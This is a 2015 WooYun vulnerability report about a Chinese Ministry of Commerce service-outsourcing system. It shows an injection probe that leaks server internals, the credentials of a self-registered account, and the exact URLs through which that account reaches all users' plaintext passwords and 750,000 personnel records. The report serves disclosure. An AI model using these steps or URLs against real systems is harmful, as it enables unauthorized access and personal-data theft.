当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106874

漏洞标题:商务部下属某系统设计不当,可造成系统内部信息泄漏

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-04-10 17:54

修复时间:2015-05-29 18:32

公开时间:2015-05-29 18:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-14: 厂商已经确认,细节仅向厂商公开
2015-04-24: 细节向核心白帽子及相关领域专家公开
2015-05-04: 细节向普通白帽子公开
2015-05-14: 细节向实习白帽子公开
2015-05-29: 细节向公众公开

简要描述:

首页你得注册个帐号,才会有下面的事:
设计缺陷,造成路径泄漏,导致越权,进而造成信息泄漏,可获取系统内已注册企业的明文密码,以及企业上报的数据,例如共计75W人员信息

详细说明:

目标地址:
http://fwwbqy.fwmys.mofcom.gov.cn/

QQ截图20150409152141.png


通过系统的注册功能,注册一个帐号

QQ截图20150409152408.png


在注册地里,你可以得到类似以下的链接

http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00&sp=S


其实我是想要试注入的~
http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00'&sp=S
然后你就会发现报了一堆的信息出来

QQ截图20150409152614.png


仔细看一下有什么

QQ截图20150409152717.png


这里也许有注入,手工注比较差,我就不试了

catalina.base /usr/local/ciecc/appsvr/apache-tomcat-6.0.29 
catalina.home /usr/local/ciecc/appsvr/apache-tomcat-6.0.29 
catalina.useNaming true 
common.loader ${catalina.base}/lib,${catalina.base}/lib/*.jar,${catalina.home}/lib,${catalina.home}/lib/*.jar 
file.encoding GB18030 
file.encoding.pkg sun.io 
file.separator / 
jasper.reports.compile.class.path /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/webapps/ROOT/WEB-INF/lib/jasperreports-0.5.2.jar 
 /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/webapps/ROOT/WEB-INF/classes 
jasper.reports.compile.temp /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/webapps/ROOT/reports 
java.awt.graphicsenv sun.awt.X11GraphicsEnvironment 
java.awt.printerjob sun.print.PSPrinterJob 
java.class.path /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/bin/bootstrap.jar 
java.class.version 50.0 
java.endorsed.dirs /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/endorsed 
java.ext.dirs /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/ext:/usr/java/packages/lib/ext 
java.home /usr/local/ciecc/appsvr/jdk1.6.0_23/jre 
java.io.tmpdir /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/temp 
java.library.path /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/i386/server 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/i386 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/../lib/i386 
 /usr/java/packages/lib/i386 
 /lib 
 /usr/lib 
java.naming.factory.initial org.apache.naming.java.javaURLContextFactory 
java.naming.factory.url.pkgs org.apache.naming 
java.runtime.name Java(TM) SE Runtime Environment 
java.runtime.version 1.6.0_23-b05 
java.specification.name Java Platform API Specification 
java.specification.vendor Sun Microsystems Inc. 
java.specification.version 1.6 
java.util.logging.config.file /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/conf/logging.properties 
java.util.logging.manager org.apache.juli.ClassLoaderLogManager 
java.vendor Sun Microsystems Inc. 
java.vendor.url http://java.sun.com/ 
java.vendor.url.bug http://java.sun.com/cgi-bin/bugreport.cgi 
java.version 1.6.0_23 
java.vm.info mixed mode 
java.vm.name Java HotSpot(TM) Server VM 
java.vm.specification.name Java Virtual Machine Specification 
java.vm.specification.vendor Sun Microsystems Inc. 
java.vm.specification.version 1.0 
java.vm.vendor Sun Microsystems Inc. 
java.vm.version 19.0-b09 
line.separator  
os.arch i386 
os.name Linux 
os.version 2.6.9-11.19AXsmp 
package.access sun.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.,sun.beans. 
package.definition sun.,java.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper. 
path.separator : 
server.loader  
shared.loader  
sun.arch.data.model 32 
sun.boot.class.path /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/resources.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/rt.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/sunrsasign.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/jsse.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/jce.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/charsets.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/modules/jdk.boot.jar 
 /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/classes 
sun.boot.library.path /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/i386 
sun.cpu.endian little 
sun.cpu.isalist  
sun.io.unicode.encoding UnicodeLittle 
sun.java.launcher SUN_STANDARD 
sun.jnu.encoding GB18030 
sun.management.compiler HotSpot Tiered Compilers 
sun.os.patch.level unknown 
tomcat.util.buf.StringCache.byte.enabled true 
user.country CN 
user.dir / 
user.home /root 
user.language zh 
user.name root 
user.timezone GMT+08:00


然后你还可以找到一堆的可疑链接

context:/pages/org/NwbFullBankEdit.html	65
context:/pages/corp/NwbAuditCorpAuthEdit.html	248
context:/pages/jour/NwbAuditHistoryList.html	21
context:/pages/corp/NwbModifyHistoryEdit.html	52
context:/pages/corp/NwbCorpAuthEdit.html	239
context:/pages/cont/NwbRecConsList.html	158
context:/pages/news/city/tianjin.html	1
context:/pages/information/DeptList.html	94
context:/pages/information/NwbAllDeptInfoPopList.html	58
context:/pages/licence/NwbAuditLicInfoList.html	129
context:/pages/licence/NwbLicInfoView.html	154
context:/pages/report/ReportCorp.html	27
context:/pages/cont/NwbConExecInfoPopEdit.html	115
context:/pages/corp/NwbFileCorpView.html	93
context:/pages/news/DeptWindowList.html	53
context:/pages/corp/NwbNewPeopleView.html	65
context:/pages/train/NwbFullBankEdit.html	89
context:/pages/information/PasswordEdit3.html	38
context:/pages/corp/NotPassCorpAuthEdit.html	221
context:/pages/news/RecWbMessageList2.html	85
context:/pages/information/ShowZoneCodeList.html	36
context:/pages/Ajax.html	2
context:/components/TiebaBorder.html	54
context:/pages/org/OrgUserEdit.html	54
context:/pages/cont/ReceiveprintStub.html	50
context:/pages/train/corp/TrainCorpList.html	306
context:/pages/cont/NwbDahuiConsList.html	32
context:/pages/NwbAnnounceList.html	66
context:/pages/information/PasswordEdit.html	41
context:/pages/corp/NwbPeopleInfoEdit.html	148
context:/pages/corp/NwbFileCorpEdit.html	216
context:/pages/news/city/dalian.html	1
context:/pages/cont/NwbAuditContChangeList.html	178
context:/pages/cont/ReportRecCons.html	68
context:/pages/Page.html	30
context:/pages/train/corp/Trainview.html	190
context:/components/RecCorpInfoBorder.html	80
context:/pages/cont/NwbRecConsAdd.html	189
context:/pages/org/NwbOrgInfoList.html	117
context:/pages/corp/NwbFullBankList.html	132
context:/pages/train/org/TrainHistoryCorpList.html	133
context:/pages/cont/NwbAuditConsEdit.html	246
classpath:/org/apache/tapestry/html/RequestDisplay.html	23
classpath:/org/apache/tapestry/pages/Exception.html	22
classpath:/org/apache/tapestry/pages/StaleSession_zh.html	8
context:/pages/train/corp/Trainedit.html	207
context:/pages/report/QueryReportCustomCorp.html	70
context:/pages/corp/NwbCorpAuthView.html	205
context:/pages/questions.html	1
context:/pages/corp/NwbAuditNewPeopleList.html	113
context:/pages/query/NwbQueryCustomEdit.html	82
context:/pages/lad/NwbLadCorpFileList.html	60
context:/pages/information/DeptUserAdd.html	76
context:/pages/report/QueryReportCustom.html	57
context:/pages/corp/NwbNewPeopleList.html	113
context:/pages/corp/NwbCorpInfoEdit.html	190
context:/pages/KfPassWord.html	69
context:/pages/news/city/nanjing.html	1
context:/pages/news/city/jinan.html	1
context:/pages/train/org/TrainPrint.html	56
context:/components/LadBorder.html	136
context:/pages/cont/Receiveprint.html	50
context:/components/OrgBorder.html	212
classpath:/org/apache/tapestry/pages/StaleSession.html	9
context:/pages/coin/NwbCoinRateExcEdit.html	28
context:/pages/corp/NwbModifyHistoryEditView.html	26
context:/pages/corp/NwbAuditPeopleInfoEdit.html	154
context:/pages/corp/NotPassCorpInfoEdit.html	190
context:/pages/corp/NwbRecCorpInfoCheckList.html	76
context:/pages/report/QueryReport.html	75
context:/pages/tieba/NwbTiebaReviewList.html	37
context:/pages/information/QueryZoneList.html	83
context:/rbac/CasLogin.html	0
context:/pages/tieba/NwbTiebaFloorList.html	53
context:/pages/DeptAjaxInfo.html	2
context:/pages/information/NwbCountryPopList.html	37
context:/pages/corp/NwbCorpAuthList.html	87
context:/pages/report/Report.html	284
classpath:/com/cofortune/framework/web/ui/paging/PageNavigation.html	110
context:/pages/lad/NwbLadTrainList.html	143
context:/pages/CorpIndex.html	74
context:/pages/corp/NwbAuditModifyHistoryEdit.html	77
context:/pages/AjaxSession.html	2
context:/pages/corp/NwbAuditCorpInfoEdit.html	444
context:/rbac/auth/Logout.html	1
context:/pages/information/DeptEdit.html	68
context:/pages/news/RecWbMessageList.html	86
context:/pages/train/NwbAuditTrainList.html	248
context:/pages/train/corp/TrainHistoryCorpList.html	133
context:/pages/information/DeptShow.html	19
context:/pages/corp/NwbAuditCorpInfoList.html	180
context:/pages/corp/NwbRecCorpInfoCheckEdit.html	36
context:/pages/corp/AjaxRecCorpCodeCheck.html	2
context:/pages/train/TrainHistoryCorpList.html	124
context:/pages/corp/NwbModifyCorpInfoEditAndMoList.html	74
context:/pages/licence/NwbLicInfoList.html	117
context:/pages/cont/NwbRecConsEdit.html	149
context:/pages/NwbUserProfileConfig.html	15
context:/components/TishiBorder.html	59
context:/rbac/auth/Exception.html	4
context:/pages/news/NewsShow.html	34
context:/pages/org/NwbOrgInfoEdit2.html	92
context:/Home.html	4
context:/pages/coin/NwbCoinRateList.html	64
context:/pages/org/NwbOrgInfoEdit.html	59
context:/pages/information/DeptUserList.html	62
context:/pages/question/NwbQuestionDeptList.html	30
context:/pages/corp/NwbAuditPeopleInfoView.html	108
context:/pages/DeptIndex.html	339
context:/pages/corp/NwbRecCorpInfoEdit.html	187
context:/pages/cont/NwbAuditBatchConsList.html	161
context:/components/CorpBorder.html	251
context:/pages/org/NwbFullBankList.html	124
context:/pages/information/ModifyDeptInfo.html	61
context:/pages/corp/NwbModifyHistoryList.html	113
context:/pages/cont/NwbAuditBatchConExecInfoList.html	170
context:/pages/report/NwbReportWzAllTotalCorp.html	94
context:/pages/org/NwbFileOrgInfoList.html	73
context:/pages/corp/NwbFileCorpInfoList.html	84
context:/pages/news/city/xiamen.html	1
context:/pages/corp/NwbAuditModifyHistoryList.html	152
context:/pages/corp/NwbAuditPeopleInfoList.html	135
context:/pages/cont/NwbRecConsLoadExecList.html	141
context:/rbac/auth/Login.html	88
context:/pages/question/NwbQuestionCorpView.html	384
context:/pages/corp/NwbFullBankEdit.html	65
context:/pages/question/NwbQuestionDeptEdit.html	467
context:/pages/cont/AjaxConsCodeCheck.html	2
context:/pages/cont/NwbAuditConsList.html	197
context:/pages/query/NwbQueryCustomList.html	60
context:/pages/query/NwbQueryCustomQuery.html	86
context:/pages/tieba/NwbTiebaTitleList.html	32
context:/pages/cont/NwbAuditConExecInfoList.html	356
context:/pages/train/QueryTrainReport.html	67
context:/pages/corp/NwbModifyCorpInfoList.html	95
classpath:/org/apache/tapestry/pages/StaleLink.html	12
context:/pages/question/NwbQuestionCorpList.html	30
context:/pages/information/PasswordEdit2.html	38
context:/pages/corp/NwbPeopleInfoView.html	108
context:/components/AppBorder.html	244
context:/pages/news/base/tianjin.html	1
context:/pages/news/city/wuhan.html	1
context:/pages/corp/NwbRecCorpAuthEdit.html	218
context:/pages/cont/NwbAuditContChangeEdit.html	73
context:/pages/query/NwbQueryCustomTemplateList.html	45
context:/components/KfBorder.html	104
context:/pages/corp/NwbFullBankView.html	39
context:/pages/cont/NwbRecConsPrint.html	126
context:/pages/org/ShowWbOrgInfo.html	33
context:/pages/news/ShowRecMessage.html	33
context:/pages/corp/NwbRecPeopleInfoEdit.html	121
context:/pages/train/NwbFullBankList.html	124
context:/pages/train/org/Trainview.html	208
context:/pages/corp/NwbCorpJfzxPopList.html	83
context:/pages/AjaxAuto.html	2
context:/pages/cont/NwbConsFwwbTongji.html	52
context:/pages/news/city/chengdu.html	1
context:/pages/train/NwbFullBankView.html	42
context:/pages/corp/NotPassPeopleInfoEdit.html	121
context:/pages/corp/RecCorpInfoMsg.html	32
context:/pages/corp/NwbNewPeopleEdit.html	106
context:/pages/cont/Tishi.html	54
context:/rbac/auth/SessionTimeOut.html	8
classpath:/com/cofortune/framework/web/ui/paging/OrderColumn.html	17
classpath:/org/apache/tapestry/html/ExceptionDisplay.html	47
context:/pages/corp/NwbAuditCorpAuthList.html	132
context:/pages/corp/NwbPeopleInfoList.html	87
context:/pages/org/OrgUserList.html	63
context:/pages/corp/NwbAuditCorpAuthView.html	205
context:/pages/org/NwbFullBankView.html	39
context:/pages/question/NwbQuestionCorpEdit.html	387
context:/pages/report/QueryReportLic.html	36
context:/components/PopBorder.html	68
context:/pages/Qbs.html	120
context:/pages/OrgIndex.html	27
context:/pages/train/org/TrainCorpList.html	302
context:/pages/information/CorpUserList.html	41
context:/pages/news/base/shanghai.html	1
context:/pages/news/SendWbMessageList.html	78
context:/pages/cont/NwbContChangePopEdit.html	78
context:/pages/report/NwbReportWzEndTotalCorp.html	94
context:/pages/news/NwbMessageEdit.html	55
context:/pages/org/NwbFileOrgEdit.html	189
context:/pages/information/NwbZoneInfoPopList.html	96
context:/pages/cont/NwbAuditConExecInfoEdit.html	150
context:/pages/corp/NotPassCorpInfo.html	56


然后回头,我们继续注册一个帐号吧,这里注册帐号虽然需要审核,但是在未审核通过之前仍然可以登录系统,接着就可以尝试越权
这里我注册了一个帐号:
帐号0502595596180
密码0502595596180

QQ截图20150409165033.png

漏洞证明:

登录系统后我发现了越权的几个页面

http://fwwbqy.fwmys.mofcom.gov.cn/pages/corp/NwbFileCorpEdit.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/news/NewsList.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/CorpUserList.html 
http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbCorpUserAdd.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/KfPassWord.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/data/NfwwbStaStatusList.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/Qbs.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/OrgIndex.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/tieba/NwbTiebaTitleList.html


其中
http://fwwbqy.fwmys.mofcom.gov.cn/pages/news/NewsList.html可对系统新闻进行新增修改与删除

QQ截图20150409165351.png


http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/CorpUserList.html
可查看到系统内所有注册用户的帐号密码

QQ截图20150409165435.png


另一个页面也可以看
http://fwwbqy.fwmys.mofcom.gov.cn/pages/KfPassWord.html

QQ截图20150409165538.png


可对帐号进行禁用
接着,可查看所有企业的人才信息(75W条记录)http://fwwbqy.fwmys.mofcom.gov.cn/pages/train/NwbTrainCardNoList.html

QQ截图20150409165804.png


以浪潮集团山东通用软件有限公司为例

QQ截图20150409170121.png


因为需要进行保存操作,我就不影响该企业的数据填报工作了,
我们可以获取到该公司的以下信息

合同信息 接包列表   数据统计 人力资源 企业认证 资金申报 人才培训     国际认证     资料附件上传     资金到位信息 企业信息 企业信息   注册地和审核部门修改   新录用人员信息 用户信息

修复方案:

控制权限

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-14 18:30

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.

最新状态:

暂无